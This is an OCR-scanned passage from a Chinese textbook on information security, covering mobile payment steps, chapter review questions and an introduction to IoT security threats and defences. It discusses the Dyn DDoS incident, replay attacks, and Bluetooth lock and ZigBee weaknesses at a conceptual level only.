(3) 收 款 银行 需要 验证 用 户 的 银行 卡 信息 的 真实 性 ,这 个 过 程 需 要 向 用 户 的 发 卡 银行 
进行 查询 。 

(4) 发 卡 银行 验证 信息 无 误 后 ,批准 本 次 支付 过 程 。 

(5) 收 款 银行 验证 商家 的 信息 后 ,对 交易 的 信息 进行 签名 以 保留 证 据 。 

(6) 商家 在 验证 消息 的 真实 性 后 .需要 向 客户 提供 订单 中 的 货物 。 

(7) 付款 过 程 完成 后 ,商家 向 自己 的 收 款 银行 发 起 取款 要 求 。 

(8) 收 款 银行 按照 合同 要 求 将 货款 划 给 商家 。 

(9) 发 卡 银行 将 成 功 付款 的 消息 告知 用 户 。 


7.7 本 章 小 结 


用 户 信 息 安全 面临 越 来 越 大 的 挑战 。 一 方面 ,IT 产品 生产 商 有 责任 提高 产品 的 安全 级 
别 ,引导 用 户 利用 各 种 安全 手段 ; 另 一 方面 ,需要 更 加 明确 的 法 律 法 规 来 规范 市 场 和 应 用 。 
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更 为 重要 的 应 该 是 用 户 本 身 需 要 提高 对 信息 安全 的 重视 ,无 论 是 在 个 人 设备 中 的 安全 设置 
措施 还 是 企业 内 部 的 信息 安全 规范 ,都 需要 提高 数据 保护 意识 。 


I 


7.8 本 章 习 题 


.为 什么 相对 于 有 线 网 络 ,无 线 网 络 的 安全 更 难以 防范 ? 

. 手机 病毒 的 传播 方式 有 哪些 ? 

. 什么 是 防水 墙 ? 它 与 防火 墙 有 什么 区 别 ? 

. 根据 防护 领域 的 不 同 ,数据 加 密 技术 有 哪些 分 类 ? 简 述 每 种 分 类 的 优 缺 点 。 
.什么 是 无 线 热 点 ? 它 存 在 的 安全 隐患 是 什么 ? 

. 简 述 WEP 协议 的 特点 和 缺陷 。 

. 简 述 WPA 协议 的 工作 原理 。 

. 简 述 移动 支付 存在 的 安全 隐患 以 及 解决 措施 。 


第 8 竟 物 联网 安全 技术 


物 联网 (Internet of Things, IoT) ,顾名思义 ,就 是 将 世界 万 物 相互 连接 的 网 络 。 通 过 
物 联 网 ,小 到 一 个 电子 锁 , 大 到 一 架 飞 机 ,都 可 以 借助 有 线 网 络 或 者 无 线 网 络 实现 通信 互联 。 
在 这 些 设备 终端 的 原 有 功能 基础 上 ,增加 相应 的 计算 功能 和 通信 的 能 力 ,使 其 更 加 智能 便 
捷 。 物 联网 有 着 广阔 的 应 用 前 景 ,在 安全 监测 ,物流 运输 、 医 疗 、 娱 乐 、 军 事 等 领域 都 有 着 不 
可 或 缺 的 重要 地 位 。 据 Gartner 公司 预测 ,到 2020 年 物 联网 设备 终端 将 达到 260 亿 台 的 规 
模 。 然 而 , 随 着 物 联 网 的 繁荣 发 展 , 物 联网 的 安全 隐患 也 将 成 为 一 个 日 益 严 峻 的 问题 。 若 不 
能 有 效 解 决 物 联网 安全 问题 ,其 发 展 将 受到 巨大 阻碍 。 

本 章 主 要 内 容 : 

。 物 联网 的 安全 威胁 

。 物 联网 安全 技术 

。 物 联网 传输 安全 案例 分 析 

。 小 数据 与 隐私 保护 


8.1 物 联 网 的 安全 威胁 


物 联 网 是 一 项 融合 了 不 同 领域 技术 的 跨 学 科技 术 。 从 物理 结构 上 分 析 , 物 联网 体系 结 
构 可 以 分 成 智能 终端 设备 .通信 技术 和 云端 /服务 器 3 部 分 。 

一 般 来 说 ,形式 各 异 的 智能 终端 设备 (如 手机 传感器 节点 等 设备 ) ,通过 Sub-1G、NFC、 
蓝牙 、WiFi、ZigBee 等 无 线 通 信 技 术 与 云端 /服务 器 进行 互联 ,云端 /服务 器 负责 收集 、 处 理 
智能 终端 设备 采集 的 数据 ,并 对 智能 终端 进行 控制 管理 。 智 能 终端 在 具有 智能 、 便 利和 高 效 
特性 的 同时 ,也 给 黑客 和 攻击 者 提供 了 大 量 的 机 会 。 更 严重 的 是 ,海量 智能 终端 设备 的 互联 
也 使 得 一 个 小 的 安全 漏洞 可 能 会 被 放大 几 十 倍 、 几 百倍 。 这 些 漏 洞 可 能 降低 设备 效率 ,暴露 
用 户 隐 私 , 危 及 用 户 财产 ,其 至 会 威胁 到 生命 安全 ,产生 无 法 估量 的 后 果 。 物 联网 的 安全 隐 
患 主 要 来 源 于 以 下 几 个 方面 。 

(1) 软 硬 件 。 

据 调查 , 现 有 的 物 联 网 设备 中 有 80% 的 设备 暴露 了 硬件 调试 接口 , 易 被 黑客 利用 。 
JTAG、SWID、UART 等 硬件 调试 接口 被 广泛 应 用 在 设计 产品 的 前 期 调试 .生产 时 的 程序 烧 
录 以 及 后 期 的 诊断 测试 阶段 。 投 入 使 用 后 , 仍 有 高 达 80% 的 设备 硬件 保留 了 调试 接口 。 这 
些 调 试 接口 给 攻击 者 提供 了 很 大 的 便利 ,攻击 者 通过 这 些 接口 可 以 获取 大 量 的 设备 信息 , 包 
括 设备 与 云端 /移动 应 用 软件 的 通信 协议 、 信 息 完整 性 校 验 的 算法 、 加 密 过 程 中 所 使 用 的 密 
钥 等 内 容 。 

物 联网 设备 的 固件 也 存在 多 种 严重 的 安全 隐患 ,具体 表现 有 : 大 量 固件 中 保留 了 调试 
命令 接口 ,升级 更 新 机 制 不 安全 ,固件 对 通信 数据 的 安全 检查 不 完整 ,大 量 设备 商 的 固件 中 
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存在 密 钥 等 敏感 信息 。 例 如 SEC Consult 在 年 度 调 查 中 发 现 来 自 50 个 厂商 的 超过 900 款 
产品 中 存在 硬 编码 密 钥 重用 的 问题 。 根 据 调查 ,现在 有 90% 的 固件 中 存在 安全 隐患 ,严重 
威胁 物 联 网 安全 。 

(2) 通信 和 网 络 。 

通信 系统 及 其 基础 设施 是 物 联网 的 基础 与 骨干 。 但 是 ,长 期 以 来 通信 系统 及 其 业务 的 
安全 性 没有 得 到 重视 ,严重 威胁 物 联网 的 安全 。 例 如 ,设备 到 服务 端 没 有 使 用 正确 验证 , 设 
备 到 服务 端 没 有 对 中 间 人 攻击 进行 保护 ,信道 无 加 密 , 存 在 重 放 攻 击 风险 ,通信 链 路 受到 监 
听 / 动 持 ,敏感 信息 泄露 及 未 授权 访问 ,等 等 。 迄 今 为 止 ,研究 者 已 经 披露 了 通信 系统 中 的 多 
种 安全 漏洞 ,针对 通信 系统 和 基础 设施 的 攻击 将 会 间接 影响 物 联 网 的 安全 。 传 统 Web 安全 
中 的 问题 同样 存在 于 物 联 网 云端 Web 接口 . 跨 站 脚本 、 文 件 修改 、 命 令 执行 及 SQL 注入 等 
仍然 是 Web 接口 中 的 重要 安全 漏洞 ( 见 图 8. 1)。 


其 他 5.90% 
文件 暴露 46036 于 他 390% 


SQL 注 入 4.90% 


文件 包含 5.70% 





命令 执行 10.40% 跨 站 脚本 
55.50% 


文件 修改 12.50% 
8.1 物 联网 云端 Web 接口 中 的 安全 漏洞 


(3) 位 置 与 时 间 安 全 隐患 。 

智能 设备 通常 配备 时 间 和 位 置 模块 ,利用 时 间 信 息 和 位 置信 息 实现 设备 的 定位 导航 等 
功能 。 常 见 的 时 间 与 位 置 的 获得 方法 有 GNSS 系统 (如 GPS、 北 斗 .GLONASS 等 )、WiFi 
辅助 定位 和 通信 基站 的 标识 信息 等 。 目 前 业界 对 位 置 和 时 间 信 息 的 关注 仍然 在 于 提高 位 置 
和 时 间 信 息 的 精确 度 , 对 其 安全 隐患 关注 较 少 。 但 是 在 2015 年 ,来 自 赫尔辛基 大 学 的 科研 
人 员 在 黑 帽 欧洲 安全 大 会 上 展示 了 最 新 发 现 : 4G LTE 协议 中 发 现 的 安全 漏洞 有 可 能 允许 
攻击 者 确定 移动 用 户 的 物理 位 置 ,并 阻止 用 户 利用 自己 的 移动 设备 拨打 或 者 接听 语音 电话 。 
该 团队 在 大 会 中 也 展示 了 两 种 欺骗 攻击 方式 : 利用 软件 无 线 电 设备 实施 GPS 位 置 时 间 欺 
骗 , 以 及 基于 普通 计算 机 无 线 网 卡 辅助 定位 系统 的 位 置 欺骗 。 后 者 更 加 简单 ,攻击 者 只 需要 
一 部 普通 的 笔记 本 电脑 就 可 以 成 功 地 攻击 常见 的 地 图 类 应 用 。 

现在 业界 在 物 联 网 上 的 关注 点 大 部 分 集中 于 开发 维护 业务 和 抢占 市 场 ,对 其 安全 隐患 
关注 力度 远 远 不 足 。 业 界 对 安全 威胁 的 牙 忽 近年 来 已 经 造成 了 严重 的 后 果 。 

2015 年 7 月 ,菲亚特 克莱斯勒 美国 公司 宣布 召回 140 万 辆 配 有 Uconnect 车 载 系统 的 
汽车 ,这 是 因为 黑客 可 通过 Uconnect 车 载 系统 发 送 恶 意 指令 ,包括 减速 ,关闭 引擎 .让 刹车 
失灵 等 ,严重 危害 人 身 和 道路 安全 。 

2015 年 8 月 的 黑 帽 大 会 和 世界 黑客 大 会 上 ,包括 汽车 在 内 的 各 种 智能 设备 都 被 曝 出 安 
全 漏洞 ,黑客 利用 安全 漏洞 可 以 控制 智能 手机 汽车、 交通 红绿灯 ,甚至 搭载 有 智能 狙击 镜 的 
高 级 狙击 步 检 。 可 以 想象 ,如 果 这 些 安全 漏洞 被 违法 分 子 、 恐 怖 组 织 利 用 ,将 会 产生 极为 严 
重 的 后 果 。 

2016 年 10 月 美国 用 户 遭 遇 了 一 次 集体 断 网 。 对 本 次 断 网 事件 进行 追根 溯源 后 发 现 ， 
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攻击 者 采用 的 就 是 普通 的 “分 布 式 拒绝 服务 攻击 ”这 一 项 非常 “原始 ”的 、 技 术 含 量 很 低 的 攻 
击 方式 。 攻 击 者 利用 大 量 的 物 联网 设备 ,包括 松下 ,三 星 等 知名 厂商 生产 的 打印 机 、 路 由 器 
和 摄像 头等 设备 ,对 Dyn 公司 管理 的 DNS 基础 设施 发 起 了 大 规模 DDoS 攻击 ,致使 包括 
Twitter、Visa、CNN、Spotify《 华 尔 街 日 报 ) 等 在 内 的 上 百 家 网 站 都 无 法 正常 访问 和 登录 。 
对 于 此 次 多 达 3 个 波 次 、 断 续 攻 击 接近 6 个 小 时 、 由 数 千 万 个 IP 地 址 一 同 发 动 的 普通 的 “分 
布 式 拒绝 服务 攻击 ”, 美 国 官方 包括 奥巴马 总 统 都 承认 “我 们 不 知道 是 谁 做 的 "。Ixia 公司 亚 
太 区 安全 业务 总 监 Phil Trainor 认为 ,这 次 遭受 攻击 的 主要 原因 在 于 密码 设置 简单 “很 多 
用 户 从 来 没有 更 改过 物 联网 设备 的 出 厂 密码 。 在 本 次 断 网 事件 中 ,攻击 者 只 是 用 了 很 简单 
的 算法 机 制 ,就 可 以 轻而易举 地 猜测 到 物 联 网 设备 的 密码 ,然后 将 其 变 成 僵尸 网 络 中 的 一 部 
分 ,加 之 目前 的 物 联 网 设备 计算 能 力 越 来 越 强 ,因此 就 被 用 来 发 起 大 规模 的 DDoS 攻击 ”。 
这 次 事件 充分 暴露 出 目前 业界 对 物 联 网 安全 问题 的 玻 忽 , 以 及 物 联 网 领域 安全 防御 技术 已 
经 落后 于 安全 攻击 技术 的 现状 。 

以 上 3 个 例子 已 经 充分 说 明了 现在 物 联网 的 安全 隐患 已 经 成 为 一 个 吸 待 解决 的 问题 ， 
研发 适用 于 物 联网 的 新 型 安全 防御 技术 与 机 制 也 成 为 刻不容缓 的 要 务 。 

下 面 介绍 物 联 网 中 的 几 种 常见 的 攻击 方式 。 

(1) 节点 攻击 。 

节点 攻击 的 方法 是 ,攻击 者 在 突破 一 台 主 机 后 ,往往 以 此 主机 作为 根据 地 ,攻击 其 他 主 
机 ,以 隐蔽 其 和 人 侵 路 径 ,避免 留 下 蛛丝马迹 。 攻 击 者 可 以 使 用 网 络 监 听 方法 ,尝试 攻破 同一 
网 络 内 的 其 他 主机 ; 也 可 以 通过 IP 欺骗 和 主机 信任 关系 攻击 其 他 主机 。 节 点 攻击 能 破坏 
两 台 机 器 间 通 信和 链 路 上 的 数据 ,其 伪装 的 目的 在 于 欺骗 网 络 中 的 其 他 机 器 ,使 之 误 将 攻击 者 
作为 合法 机 器 加 以 接受 , 诱 使 其 他 机 器 向 攻击 者 发 送 数 据 或 允许 攻击 者 修改 数据 。 

(2) 重 放 攻击 。 

重 放 攻 击 (replay attack) 又 称 重 播 攻 击 、 回 放 攻 击 或 新 鲜 性 攻击 (freshness attack) ,是 
指 攻击 者 发 送 一 个 目的 主机 已 接收 过 的 包 , 特 别 是 在 认证 的 过 程 中 用 于 认证 用 户 身份 所 接 
收 的 包 , 来 达到 欺骗 系统 的 目的 ,主要 用 于 身份 认证 过 程 ,能 够 破坏 认证 的 安全 性 。 

下 面 通过 RFID 系统 中 的 重 放 攻击 来 理解 其 工作 方式 ,如 图 8. 2 所 示 。 在 RFID 系统 
中 ,由 于 无 法 证 明 一 个 信息 是 否 已 经 发 送 给 了 阅读 器 (又 称 读 写 器 ) ,攻击 者 可 以 截获 或 复制 
一 个 合法 的 标签 曾经 发 送 过 的 信息 ,并 欺骗 性 地 重复 发 送 到 一 个 目标 阅读 器 上 ,获得 通过 认 
证 的 身份 ,再 次 获得 相应 服务 。 重 放 攻 击 可 以 由 信息 发 起 者 发 起 ,也 可 以 由 敌 方 拦截 者 发 起 。 












合法 数据 一 一 验证 成 功 


截获 数据 重复 数据 一 验证 成 功 


图 8.2 RFID 系统 的 重 放 攻 击 示例 
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加 密 可 以 有 效 地 防止 会 话 劫持 ,但 对 重 放 攻 击 无 效 。 由 于 发 送 的 是 合法 标签 的 合法 数 
据 , 可 以 绕 过 阅读 器 的 身份 验证 ,让 阅读 器 误 将 攻击 者 当做 合法 的 标签 ,使 其 可 以 获得 相应 
的 服务 ,达到 攻击 目的 。 

(3) 拒绝 服务 攻击 。 

拒绝 服务 攻击 (DoS attack) 是 攻击 者 常用 的 攻击 手段 之 一 , 指 攻击 者 设法 让 目标 机 器 
停止 提供 服务 。 拒 绝 服务 攻击 有 两 种 实现 效果 : 

。 迫使 服务 器 的 缓冲 区 满 ,无 法 接收 新 的 请 求 。 

。 使 用 IP 地 址 欺骗, 迫使 服务 器 把 非法 用 户 的 连接 复位 ,影响 合法 用 户 的 连接 。 

在 传统 网 络 中 ,由 于 网 络 协议 本 身 的 安全 缺陷 ,拒绝 服务 攻击 问题 一 直 得 不 到 合理 的 解 
决 ,因此 拒绝 服务 攻击 也 成 为 了 攻击 者 的 终极 手法 。 物 联网 中 也 存在 拒绝 服务 攻击 的 安全 
隐患 。 其 中 , 物 联网 的 对 象 名 解析 服务 (ONS) 是 以 DNS 技术 为 基础 的 ,因此 ONS 也 继承 
了 DNS 的 安全 隐患 。 尤 其 是 物 联网 的 终端 设备 数量 巨大 并 且 通 常 以 集群 的 方式 互联 , 若 引 
发 大 量 设 备 同时 产生 并 发 送 数 据 , 则 可 能 会 发 生 网 络 拥 塞 , 产 生 拒绝 服务 攻击 。 另 外 攻击 者 
利用 广播 信息 以 及 通信 机 制 中 优先 级 策略 、 虚 假 路 由 等 协议 漏洞 同样 可 以 发 起 拒绝 服务 
攻击 。 

前 文中 提 到 的 2016 年 10 月 美国 大 规模 断 网 事件 就 是 一 种 分 布 式 的 拒绝 服务 攻击 
(DDoS attack)。 大 量 的 物 联网 终端 ,如 监控 摄像 头 、 智 能 电视 、 打 印 机 等 设备 构成 候 尸 网 
络 , 产 生 大 量 的 垃圾 数据 以 攻击 美国 最 主要 的 DNS 服务 商 Dyn 公司 ,使 得 Dyn 服务 器 的 流 
量 瞬 间 激 增 。 由 于 Dyn 服务 器 的 主要 职责 是 将 域名 解析 为 IP 地 址 ,从 而 准确 跳 转 到 用 户 
想 要 访问 的 网 站 ,因此 Dyn 服务 器 遭受 攻击 意味 着 来 自用 户 的 网 页 访问 请 求 无 法 被 正确 接 
收 和 解析 ,从 而 导致 合法 用 户 访问 网 页 时 出 现 错误 。 

在 2016 年 以 前 ,大 多 数 DDoS 的 攻击 不 会 超过 200Gb/s, 而 且 发 生 大 规模 的 攻击 事件 
频率 也 较 低 。 但 是 2016 年 由 DDoS 攻击 发 起 的 网 站 流量 激增 到 600Gb/s 以 上 ,相信 随 着物 
联网 设备 的 激增 ,DDoS 攻击 的 强度 也 会 日 益 增 加 。 因 此 如 何 预防 和 抵御 DoS/DDoS 攻击 
已 经 成 为 一 个 亟待 解决 的 课题 。 

(4) 算 改 、 汇 露 标 识 数据 。 

基于 标识 (包括 RFID、 条 形 码 等 ) 的 物 联网 在 物流 管理 .资产 追踪 、 公 共 安 全 ,车 辆 管理 
等 领域 都 有 着 广泛 的 应 用 。 但 是 大 多 数 设备 为 了 控制 成 本 ,对 识别 数据 并 没有 采用 较 强 的 
加 密 机 制 ,甚至 大 多 未 进行 加 密 处 理 ,相应 的 信息 容易 被 非法 读 取 , 导 致 非法 跟踪 甚至 修改 
数据 。 除 此 之 外 ,各 种 可 穿戴 物 联网 设备 也 存在 泄漏 标识 别 数据 和 用 户 隐 私信 息 的 隐患 。 

(5) 权限 提升 。 

权限 提升 是 指 攻 击 者 通过 协议 漏洞 或 其 他 脆弱 性 使 得 某 节 点 获取 额外 的 高 级 别 服务 ， 
甚至 控制 物 联网 其 他 节点 的 运行 。 根 据 国家 信息 安全 漏洞 共享 平台 (CNVD) 一 项 针对 
2016 年 IoT 设备 漏洞 的 调查 ,多 款 mtk 平台 手机 FOTA( 无 线 升级 ) 服 务 存在 system 权限 
提升 漏洞 。 攻 击 者 利用 漏洞 可 将 权限 提升 至 system 权限 ,进行 一 些 越权 操作 。CNVD 对 
该 漏洞 的 综合 评级 为 “中 危 ”。 

(6) 隐私 泄露 。 

在 未 来 的 物 联网 中 ,每 件 物品 尤其 是 和 用 户 密切 相关 的 设备 (例如 可 穿戴 设备 ) 都 将 随 
时 被 感知 并 随时 连接 在 网 络 上 ,在 物 联 网 中 如 何 确保 信息 的 安全 性 和 隐私 性 ,防止 个 人 信 
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息 、 业 务 信息 和 财产 丢失 或 被 他 人 盗用 ,将 是 物 联网 发 展 急需 突破 的 重大 障碍 之 一 。 

来 自 非 营利 组 织 Open Effect 和 多 伦 多 大 学 的 一 项 研究 显示 ,在 多 款 运 动手 环 产品 中 ， 
仅 有 一 款 产 品 遵循 了 蓝牙 隐私 标准 ,其 他 多 款 主流 的 运动 手 环 都 会 通过 和 配对 手机 的 蓝牙 
连接 泄露 用 户 数据 ,即使 关闭 配对 手机 上 的 蓝牙 功能 也 无 法 解决 这 一 问题 。 

用 户 使 用 运动 手 环 记录 的 个 人 身份 信息 (包括 姓名 、 性 别 、 手 机 号 码 等 ) 、 运 动 数据 热量 
消耗 .锻炼 进度 .日常 活动 等 都 会 被 泄露 。 研 究 显示 ,这 些 运 动手 环 的 运动 追踪 设备 有 着 * 固 
定 ” 的 广播 独立 标识 符 ,而 通过 这 一 标识 符 ,攻击 方 可 以 跟踪 手 环 在 任意 时 刻 的 位 置 。 即 使 
将 配对 手机 上 的 蓝牙 连接 关闭 ,广播 独立 标识 符 仍然 有 可 能 被 泄露 ,用 户 隐 私信 息 也 有 泄露 
的 可 能 。 

目前 ,业内 已 经 制定 了 蓝牙 隐私 标准 ,明确 规定 了 设备 厂商 应 如 何 保护 用 户 隐私 。 相 关 
研究 人 员 表 示 , 大 部 分 手 环 设备 商 已 经 对 该 研究 结果 做 出 了 回应 ,表示 愿意 就 隐私 保护 和 信 
息 安 全 问题 进行 商讨 沟通 。 


8.2 物 联 网 安全 技术 


电子 产品 码 (Electronic Product Code, EPC) 是 RFID 技术 的 重要 应 用 领域 之 一 ,是 由 
美国 麻 省 理工 学 院 的 自动 识别 研究 中 心 开 发 的 , 旨 在 通过 互联 网 ,利用 射频 识别 无线 数据 
通信 等 技术 ,构造 一 个 实现 全 球 物品 信息 实时 共享 的 物 联网 。 

针对 EPC 的 安全 性 ,目前 业界 通常 从 横向 或 纵向 两 个 方面 进行 研究 来 提升 其 安全 水 
平 ,提出 的 相关 技术 体系 (STA_EPC) 如 图 8. 3 所 示 , 包 括 物 理 安全 、 安 全 计算 环境 、 安 全 区 
域 边界 、 安 全 通信 和 网络 、 安 全 管理 中 心 ,应急 响 应 恢复 与 处 置 6 个 方面 ,其 中 “一 个 中 心 "管理 
下 的 “三 重 保护 ”是 核心 ,物理 安全 是 基础 ,应 急 响应 处 置 与 恢复 是 保障 。 

安全 体系 中 的 安全 技术 范围 主要 涵盖 以 下 内 容 : 

。 物理 安全 。 主 要 包括 物理 访问 控制 \ 环 境 安全 (监控 ,报警 系统 、 防 雷 、 防 火 、 防 水 、 防 
潮 、 静 电 消 除 器 等 装置 ) .电磁 屏蔽 安全 .EPC 设备 安全 。 

。 安全 计算 环境 。 包 括 感知 节点 身份 鉴别 .自主 /强制 /角色 访问 控制 .授权 管理 
(PKI/PMI 系统 ) ,感知 节点 安全 防护 (恶意 节点 .节点 失效 识别 )、 标 签 数据 源 可 信 、 
数据 保密 性 和 完整 性 、.EPC 业务 认证 .系统 安全 审计 等 。 

。 安全 区 域 边界 。 主 要 包括 节点 控制 (网 络 访问 控制 .节点 设备 认证 )、 信 息 安全 交换 
(数据 机 密 性 与 完整 性 ,指令 数据 与 内 容 数据 分 离 .数据 单 向 传输 ) 、 节 点 完整 性 ( 防 
护 非法 外 联 、 入 侵 行为 恶意 代码 防范 ) .边界 审计 等 。 

。 安全 通信 网 络 。 主 要 包括 链 路 安全 (物理 专用 或 逻辑 隔离 ) ,传输 安全 (加 密 控制 、 消 
息 摘 要 或 数字 签名 ) 等 。 

。 安全 管理 中 心 。 主 要 包括 业务 与 系统 管理 (业务 准 入 接 入 与 控制 ,用户 管理 ,资源 配 

置 、.EPCIS 管理 ) ,安全 检测 系统 (入 侵 检 测 、 违 规 检 查 、EPC 数字 取证 ) ,安全 管理 
(EPC 策略 管理 .审计 管理 .授权 管理 .异常 与 报警 管理 ) 等 。 

应 急 响 应 恢复 与 处 置 主 要 包括 容 灾 备份 .故障 恢复 ,安全 事件 处 理 与 分 析 、 应 急 机 
制 等 。 
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8.3 物 联网 安全 体系 结构 


8.3 物 联 网 传输 安全 案例 分 析 


8.3.1 基于 蓝牙 的 传 感 网 安全 传输 技术 


蓝牙 技术 提供 短 距 离 的 对 等 通信 , 它 在 应 用 层 和 链 路 层 上 都 采取 了 保密 措施 以 保证 通 
信 的 安全 性 ,所 有 的 蓝牙 设备 都 采用 相同 的 认证 和 加 密 方式 。 在 链 路 层 , 使 用 4 个 参数 来 加 
强 通信 的 安全 性 , 即 蓝牙 设备 地 址 BD_ADDR 认证 私 钥 .加 密 私 钥 和 随机 码 RAND。 
。 蓝牙 设备 地 址 是 一 个 48 位 的 IEEE 地 址 , 它 可 以 唯一 地 识别 蓝牙 设备 ,对 所 有 蓝牙 
设备 都 是 公开 的 。 
。 认证 私 钥 在 设备 初始 化 期 间 生成 ,其 长 度 为 128b。 
。 加 密 私 钥 通 常 在 认证 期 间 由 认证 私 钥 生 成 ,其 长 度 根据 算法 要 求 选择 8 一 128b 之 间 
的 数 (8 的 整数 倍 ) ,对 于 目前 的 绝 大 多 数 应 用 ,采用 64b 的 加 密 私 钥 就 可 满足 其 安 
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全 性 需求 。 
。 随机 码 由 蓝牙 设备 的 伪 随 机 过 程 产生 ,其 长 度 为 128b。 
链 路 层 安全 机 制 提供 了 多 种 认证 方案 和 一 个 灵活 的 加 密 方案 。 但 链 路 级 安全 存在 明显 
的 不 足 : 蓝牙 的 链 路 级 认证 是 基于 设备 的 ,而 不 是 基于 用 户 的 ; 对 服务 没有 进行 区 分 ,没有 
针对 每 个 蓝牙 设备 的 授权 服务 机 制 。 
在 链 路 层 安 全 机 制 的 基础 上 ,应 用 层 的 服务 级 安全 针对 服务 进行 区 分 ,提供 灵活 的 接 入 
控制 。 
尽管 蓝牙 规范 中 定义 了 安全 机 制 ,但 是 蓝牙 技术 的 安全 问题 仍 无 法 根除 。 本 节 以 蓝牙 
锁 为 例 , 说 明 蓝 牙 技 术 的 安全 问题 。 蓝 牙 锁 是 一 种 通过 数字 密 钥 实现 的 授权 方式 ,现在 已 经 
广泛 地 应 用 在 家 居 安 防 .单车 租赁 等 各 个 领域 。 蓝 牙 锁 给 生活 带 来 了 极 大 的 便利 ,但 是 几乎 
所 有 的 蓝牙 锁 都 存在 着 安全 漏洞 。 
蓝牙 锁 的 安全 漏洞 主要 有 以 下 3 个 : 
。 明文 密码 。 许 多 蓝牙 锁 虽 然 设 有 密码 , 却 使 用 了 明文 传输 ,任何 人 只 要 有 一 个 简单 
的 蓝牙 探测 器 (如 Ubertooth) ,不 必 花 费 太 多 精力 就 能 获得 密码 。 

。 重 放 攻 击 。 尽 管 可 以 把 信号 进行 高 强度 加 密 , 攻 击 者 不 太 可 能 解 开 信号 内 容 , 但 是 
只 需要 拦截 解锁 信号 并 且 重 放 给 锁 , 同 样 可 以 打开 锁 。 

。 中间人 攻击 。 又 名 中 继 攻击 ,攻击 者 处 在 两 个 设备 之 间 的 通信 和 链接 的 中 间 , 监 控 着 
两 个 设备 之 间 的 所 有 通信 。 中 间 人 可 以 获取 所 有 发 送 给 接收 设备 的 命令 ,比如 “ 锁 
定 ” 指 令 , 可 以 复制 该 指令 进而 攻击 接收 设备 。 

在 2016 年 的 拉 斯 维 加 斯 黑客 大 会 上 ,研究 人 员 Anthony Rose 展示 了 如 何 用 价值 仅 
100 美元 的 Ubertooth 嗅 探 器 、40 美元 的 树 莓 派 .50 美元 的 高 性 能 天 线 和 15 美元 的 USB 
蓝牙 适配器 对 蓝牙 锁 进行 攻击 。 展 示 结 果 表 明 , 其 中 4 款 蓝牙 锁 都 是 以 明文 的 形式 传输 密 
码 , 使 得 密码 非常 容易 被 数据 嗅 探 器 捕捉 到 ; 而 被 测 的 另 5 种 智能 锁 则 很 容易 受到 重 放 攻 
击 , 当 锁 被 使 用 时 ,黑客 收集 信号 并 存储 ,再 次 发 送 即 可 解锁 设备 。 据 报道 ,高 达 75% 的 蓝 
牙 锁 都 可 以 轻易 地 破解 。 

更 加 令 人 不 安 的 是 ,现在 蓝牙 锁 的 厂商 虽然 意识 到 了 蓝牙 锁 的 安全 漏洞 ,但 大 部 分 厂商 
并 没有 积极 地 针对 其 产品 的 安全 漏洞 进行 反馈 。 在 提供 便利 的 同时 ,还 要 兼顾 安全 性 保障 ， 
蓝牙 锁 的 发 展 仍然 有 很 长 的 路 要 走 。 


8.3.2 基于 ZigBee 的 传 感 网 安全 传输 技术 


和 蓝牙 类 似 ,ZigBee 也 是 一 种 常用 的 低 成 本 、 低 功 耗 、 近 距离 的 无 线 组 网 通信 技术 。 
ZigBee 技术 的 物理 层 和 数据 链 路 层 协议 主要 采用 IEEE 802. 15. 4 标准 ,而 网 络 层 和 应 用 层 
由 ZigBee 联盟 负责 建立 。 

ZigBee 协议 栈 如 图 8.4 所 示 。 

。 物理 层 提供 基本 的 无 线 通信 。 

。 数据 链 路 层 (MAC) 提 供 设 备 之 间 通 信 的 可 靠 性 及 单 跳 通 信 的 链接 。 

。 网 络 层 (NWK) 负 责 拓扑 结构 的 建立 和 维护 、 命 名 和 绑 定 服务 ,完成 寻 址 、 路 由 及 安 

全 这 些 不 可 缺少 的 任务 。 
。 应 用 层 包括 应 用 支持 子 层 (APS) .ZigBee 设备 对 象 (ZigBee Device Object,ZDO) 和 
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8.4 ZigBee 协议 栈 结构 


应 用 框架 ,其 中 ZDO 描述 了 应 用 对 象 的 公用 接口 ,APS 为 ZDO 和 应 用 对 象 提供 了 
通用 服务 集 。 
数据 链 路 层 、 网 络 层 和 应 用 层 负 责 在 各 自 层 上 传输 安全 的 数据 ,而 且 应 用 支持 子 层 提供 
了 安全 关系 的 建立 和 维护 等 服务 ,ZDO 管理 安全 策略 和 设备 的 安全 配置 。 
ZigBee 提供 了 高 可 靠 性 的 安全 保障 ,其 安全 保障 措施 包括 密码 建立 、 密 码 传输 、 帧 保护 
和 设备 管理 。 一 般 来 说 ,ZigBee 被 认为 是 目前 短 距 离 无 线 通 信 技 术 中 最 安全 的 一 种 ,其 安 
全 性 来 源 于 系统 性 的 设计 。 
ZigBee 采用 了 AES( 高 级 加 密 系 统 ) 加 密 .AES 是 美国 国家 标准 与 技术 研究 所 用 于 加 
密 电 子 数据 的 规范 ,其 保密 性 是 普通 银行 卡 的 12 倍 , 它 被 认为 可 以 成 为 人 们 公认 的 加 密 标 
准 ,在 金融 .电信 和 政府 数字 信息 等 领域 得 到 广泛 应 用 。AES 加 密 可 以 有 效 对 抗 最 常见 的 
ZigBee 安全 攻击 一 一 密 钥 攻击 。 
2015 年 黑 帽 大 会 上 ,安全 人 员 公 布 发 现 了 采用 ZigBee 协议 的 设备 的 漏洞 。 但 是 ,安全 
人 员 同 时 也 指出 ,安全 漏洞 并 不 是 由 ZigBee 协议 设计 本 身 引 发 的 ,而 是 来 源 于 设备 制造 商 
的 羽 忽 。 这 些 漏 洞 包 括 : 
。 如 果 采 用 ZigBee 协议 标准 ,在 不 安全 的 传输 机 制 下 传输 初始 密 钥 ,再 加 上 设备 制造 
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商 采用 默认 的 链 路 密 钥 ,攻击 者 可 以 轻易 得 到 机 会 侵入 网 络 ,通过 嗅 探 某 个 设备 来 
破解 用 户 配 置 文件 ,并 使 用 默认 链 路 密 钥 加 入 该 网 络 。 

。 由 于 ZigBee 的 安全 性 很 大 程度 上 依赖 于 密 钥 的 保密 性 , 即 加 密 密 钥 安全 的 初始 化 
及 传输 过 程 , 因 此 设备 制造 商 为 了 产品 的 互通 性 和 使 用 便利 性 而 使 用 默认 密 钥 的 行 
为 ,破坏 了 ZigBee 的 安全 机 制 ,使 得 ZigBee 设备 存在 极 大 的 安全 隐患 。 


8.3.3 基于 UWB 的 传 感 网 安全 传输 技术 


UWB 具有 低 成 本 、 传 输 速率 高 .空间 容量 大 、 低 功 耗 等 优点 。 作 为 无 线 传输 技术 之 一 ， 
UWB 同样 也 面临 着 DoS、 密 钥 泄 露 \ 假 冒 攻击 等 攻击 风险 。 针 对 UWB 的 安全 问题 ,国际 标 
